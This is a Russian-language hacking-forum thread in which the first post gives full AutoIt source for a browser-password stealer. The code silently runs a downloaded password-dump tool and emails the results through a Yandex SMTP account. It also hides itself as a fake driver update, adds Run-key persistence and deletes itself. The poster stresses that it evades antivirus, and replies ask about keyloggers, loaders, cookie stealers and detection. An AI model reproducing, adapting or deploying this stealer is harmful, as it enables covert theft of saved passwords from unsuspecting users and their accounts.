1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Стиллер на Autoit.

Тема в разделе "Кейлоггеры | Стиллеры | Грабберы", создана пользователем Ltybcrf, 26 сен 2012.

  1. TopicStarter Overlay
    Ltybcrf

    Ltybcrf Гость



    Код:
    #NoTrayIcon
    #include <array.au3>
    #include <file.au3>
    #include <inet.au3>
     
    $s=0
    $o=0
    $sArgument = '/600'
    while $s<=1
    $var = _GetIP()
     
    $e=StringCompare($var,"-1")
     
    If Not $e= 0 Then
     
    while $o <=1
     
    ;~  $file=inetget("http://www.nirsoft.net/utils/webbrowserpassview.zip",@TempDir&"\webbrowserpassview.zip")
    if inetget("http://www.nirsoft.net/utils/webbrowserpassview.zip",@TempDir&"\webbrowserpassview.zip") Then
    sleep(1000)
    _Zip_UnzipAll(@TempDir&"\webbrowserpassview.zip",@TempDir&"\ey283gFt")
    sleep(1000)
    ShellExecuteWait(@TempDir&"\ey283gFt\WebBrowserPassView.exe","/stext "&@TempDir&"\ey283gFt\"&@ComputerName&".txt","","",@SW_HIDE)
    sleep(100)
    $str = "http://schemas.microsoft.com/cdo/configuration/"
    $hMAIL = ObjCreate ("CDO.Message")
        With $hMAIL
    ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::{
    ;;;;;;;;;;;;;;;;;;;;;;;; Вносим данные ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
            .From = "*******@yandex.ru" ;from e-mail
            .To = "*******@yandex.ru" ;to e-mail
            .Subject = @UserName&"- send all File"
            .TextBody = "Virus BrowserPass stealer by Ltybcrf(HOT-HACK)!"
            .AddAttachment (@TempDir&"\ey283gFt\"&@ComputerName&".txt") ;файл для отправки
        EndWith
        With $hMAIL.Configuration.Fields
            .Item ($str & "sendusing") = 2
            .Item ($str & "smtpserver") = "smtp.yandex.ru" ;SMTP Server
            .Item ($str & "smtpauthenticate") = 1
            .Item ($str & "sendusername") = "*******" ;Login
            .Item ($str & "sendpassword") = "*******" ;Пароль SMTP-сервера
            .Item ($str & "smtpserverport") =587 ;Порт
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;}
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
     
            .Update
        EndWith
    $hMAIL.Send
     
    $s=5
    $o=5
    EndIf
    WEnd
     
    Else
    $de=@HomeDrive&"\DriverStores"
    if not @ScriptFullPath<>$de&"\DriverUdate.exe" then
    dircreate($de)
    FileSetAttrib($de,"+H")
    filecopy(@ScriptFullPath,$de&"\DriverUdate.exe",1)
    _RegRun($sArgument)
    sleep(1000)
    _dels()
    endif
    EndIf
    WEnd
    DirRemove(@TempDir&"\ey283gFt\",1)
    filedelete(@TempDir&"\webbrowserpassview.zip")
    _dels()
    Func _dels()
    $sTemp = _TempFile(@TempDir, '~', '.bat')
    $sPath = FileGetShortName(@ScriptFullPath)
        $hFile = FileOpen($sTemp, 2)
        FileWriteLine($hFile, '@echo off')
        FileWriteLine($hFile, ':loop')
        FileWriteLine($hFile, 'del ' & $sPath)
        FileWriteLine($hFile, 'if exist ' & $sPath & ' goto loop')
        FileWriteLine($hFile, 'del ' & $sTemp)
        FileClose($hFile)
     
        Run($sTemp, '', @SW_HIDE)
    EndFunc  ;==>_ScriptDestroy
     
     
    If $CmdLine[0] Then
        $iTimer = StringRegExpReplace($CmdLine[1], '[^0-9]', '') * 1000
        $iStart = TimerInit()
        While TimerDiff($iStart) <= $iTimer
            Sleep(250)
        WEnd
    EndIf
     
     
     
    Func _RegRun($s_Argument)
        Local $sRegRun = 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
        If Not RegRead($sRegRun, "DriverUpdate") Or RegRead($sRegRun, "DriverUpdate") <> @HomeDrive&"\DriverStores\DriverUdate.exe" & ' ' & $s_Argument Then
            RegWrite($sRegRun, "DriverUpdate", 'REG_SZ', @HomeDrive&"\DriverStores\DriverUdate.exe " & $s_Argument)
        EndIf
    EndFunc  ;==>_RegRun
     
     
    Func _Zip_UnzipAll($hZipFile, $hDestPath, $flag = 1)
     
    Local $DLLChk = _Zip_DllChk()
     
    If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0);no dll
     
    If not _IsFullPath($hZipFile) then Return SetError(4,0) ;zip file isn't a full path
     
    If Not FileExists($hZipFile) Then Return SetError(2, 0, 0) ;no zip file
     
    If Not FileExists($hDestPath) Then DirCreate($hDestPath)
     
    Local $aArray[1]
     
    $oApp = ObjCreate("Shell.Application")
     
    $oApp.Namespace($hDestPath).CopyHere($oApp.Namespace($hZipFile).Items)
     
    For $item In $oApp.Namespace($hZipFile).Items
     
    _ArrayAdd($aArray, $item)
     
    Next
     
    While 1
     
    If $flag = 1 then _Hide()
     
    If FileExists($hDestPath & "\" & $aArray[UBound($aArray) - 1]) Then
     
    Return SetError(0, 0, 1)
     
    ExitLoop
     
    EndIf
     
    Sleep(500)
     
    WEnd
     
    EndFunc  ;==>_Zip_UnzipAll
     
     
     
     
    Func _Zip_DllChk()
     
    If Not FileExists(@SystemDir & "\zipfldr.dll") Then Return 2
     
    If Not RegRead("HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}", "") Then Return 3
     
    Return 0
     
    EndFunc  ;==>_Zip_DllChk
     
    Func _IsFullPath($path)
     
        if StringInStr($path,":\") then
     
            Return True
     
        Else
     
            Return False
     
        EndIf
     
    Endfunc
     
    Func _Hide()
     
    If ControlGetHandle("[CLASS:#32770]", "", "[CLASS:SysAnimate32; INSTANCE:1]") <> "" And WinGetState("[CLASS:#32770]") <> @SW_HIDE Then ;The Window Exists
     
    $hWnd = WinGetHandle("[CLASS:#32770]")
     
    WinSetState($hWnd, "", @SW_HIDE)
     
    EndIf
     
    EndFunc

    Скачать сам компилятор Autoit можно Please login or register to view links.
    Обращаю Ваше внимание на безпаливность троянов написаных на Autoit.
     
    • Like Like x 4
    Метки:
  2. Nmka

    Nmka Почетный юзер

    Регистрация:
    10 май 2012
    Сообщения:
    100
    Симпатии:
    101
    Кейлоггер реально написать?
     
  3. TopicStarter Overlay
    Ltybcrf

    Ltybcrf Гость

    есть сорцы на C++
    реально )
     
  4. asiman

    asiman

    Регистрация:
    10 май 2012
    Сообщения:
    467
    Симпатии:
    238
    да,но надо попробовать написать лоадер)
     
  5. bios

    bios

    Регистрация:
    22 июн 2012
    Сообщения:
    539
    Симпатии:
    622
    точно
     
  6. TopicStarter Overlay
    Ltybcrf

    Ltybcrf Гость

    выложу сегодня стиллер (консольный) на Autoit который снимает куки со всех браузеров ..да, не пароли а именно куки.
     
  7. viziter-msk

    viziter-msk

    Регистрация:
    22 окт 2012
    Сообщения:
    272
    Симпатии:
    59
    было бы не плохо, с куками тоже интересно работать
     
  8. TopicStarter Overlay
    Vladimir

    Vladimir Гость

    а что это за стиллер?
     
  9. SiNTaKsIs

    SiNTaKsIs

    Регистрация:
    26 июн 2012
    Сообщения:
    72
    Симпатии:
    79
    Ты в каждой теме будешь постить свои бессмысленные посты? о_О Есть видео, есть код... Смотри сколько всего есть... А ты не можешь посмотреть...
     
  10. SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Вещь!:)
     
    • Like Like x 1
  11. TopicStarter Overlay
    Vladimir

    Vladimir Гость

    ты что-то имеешь против? мне интересно! хочу - пишу.
     
  12. SiNTaKsIs

    SiNTaKsIs

    Регистрация:
    26 июн 2012
    Сообщения:
    72
    Симпатии:
    79
    Если тебе так интересно... То открой глаза шире мля... Или иди в гугл... Там все найдешь... И то что интересно тебе и то что не интересно... А докучать нас своими вопросами нубовскими не нада...
     
  13. TopicStarter Overlay
    shosho

    shosho Гость

    Долго метался между стиллером и кейлогером, остановился на этом, я правдв так с фтп и не понял.
     
  14. TopicStarter Overlay
    Vladimir

    Vladimir Гость

    если я захочу, я напишу, а отвечать или нет - это твое дело.
     
  15. SiNTaKsIs

    SiNTaKsIs

    Регистрация:
    26 июн 2012
    Сообщения:
    72
    Симпатии:
    79
    Ну так херню не пиши...
     
    • Like Like x 1
  16. TopicStarter Overlay
    Ltybcrf

    Ltybcrf Гость

    Анука прекратили шкубаться!
     
  17. Fr0st

    Fr0st Петросян :)

    Регистрация:
    4 июн 2012
    Сообщения:
    61
    Симпатии:
    15
    Кто сделал отпишитесь

    Палят ли его АВ?
     
  18. Gangan8800

    Gangan8800

    Регистрация:
    20 дек 2012
    Сообщения:
    51
    Симпатии:
    25
    avir у меня его не палит , но прога спрашивает разрешение передачу файлов :( мб что то я не так делаю кто то знает?
     

Поделиться этой страницей

Загрузка...